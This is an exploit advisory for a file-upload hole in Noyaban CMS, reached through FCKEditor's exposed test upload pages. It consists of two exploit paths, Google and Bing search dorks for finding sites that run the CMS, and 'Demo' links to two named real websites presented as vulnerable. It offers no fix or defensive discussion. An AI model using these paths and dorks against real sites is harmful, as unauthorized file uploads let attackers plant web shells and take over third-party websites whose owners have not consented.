facebook facebook twitter rss

Noyaban CMS File Upload Vulnerability (FCKEditor)

Author: Iran Cyber Security Group , Published: 08-06-2015
# Exploit Title : Noyaban CMS File Upload Vulnerability (FCKEditor)

# Date : 07/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : WH!T3 W01F

# Contact : whit3_w01f@att.net

# Software Link : www.noyaban.com

# Version : All Versions

# Category : Web Application Bugs

# Google Dork : intext:طراحی سایت و بهینه سازی سایت توسط نویابان

# Bing Dork : "طراحی سایت و بهینه سازی سایت توسط نویابان"

# Tested On : Windows

# Home : Iran-Cyber.Org

PoC :

Exploit 1 : site.com/fckeditor/editor/filemanager/browser/default/connectors/test.html

Exploit 2 : site.com/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html

Demo :

http://setski.ir/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html

http://www.djtravel.ir/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html

# Thanks To : root3r - KamraN HellisH - MOHAMAD-NOFOZI - Sheytan Azzam - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group

Like us on Facebook :